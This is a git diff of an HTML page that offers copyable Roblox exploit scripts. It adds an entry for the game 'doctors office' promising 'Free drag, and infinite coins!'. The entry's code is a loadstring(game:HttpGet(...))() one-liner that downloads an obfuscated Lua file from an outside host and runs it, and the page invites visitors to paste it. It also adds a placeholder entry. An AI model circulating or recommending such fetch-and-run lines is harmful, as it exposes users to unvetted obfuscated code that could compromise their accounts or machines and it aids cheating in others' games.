--- a/index.html
+++ b/index.html
@@ -345,16 +345,30 @@
 
 
 <div class="script-item new-style">
-    <div class="script-header">i</div>
-    <div class="subheader">A brief description of what this script does.</div>
-    <div class="script-code">print("i")
+    <div class="script-header">doctors office 🔊</div>
+    <div class="subheader">Free drag, and infinite coins!</div>
+    <div class="script-code">loadstring(game:HttpGet("https://getorbs.us.to/DO-obfuscated.lua"))()
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
         <!-- Optional: Add a button to join the game -->
-        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/123456789/My-New-Game')">Game link</button>
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/18169009346/doctors-office')">Game link</button>
     </div>
 </div>
+
+
+<div class="script-item new-style">
+    <div class="script-header">j</div>
+    <div class="subheader">j</div>
+    <div class="script-code">print("j")
+    </div>
+    <div class="button-container">
+        <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
+        <!-- Optional: Add a button to join the game -->
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/18169009346/doctors-office')">Game link</button>
+    </div>
+</div>
+
 
 
         </div>
